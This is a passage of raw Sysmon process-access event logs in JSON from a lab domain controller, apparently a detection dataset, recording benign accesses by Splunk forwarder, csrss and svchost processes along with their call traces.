C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","SourceProcessId":"4368","SourceThreadId":"3288","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-0010623B0500}","TargetProcessId":"4528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3355,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023B-5F25-0000-0010623B0500}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023B-5F25-0000-0010623B0500}","TargetProcessId":"4528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3356,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3357,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3358,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3359,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3360,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3361,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3362,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 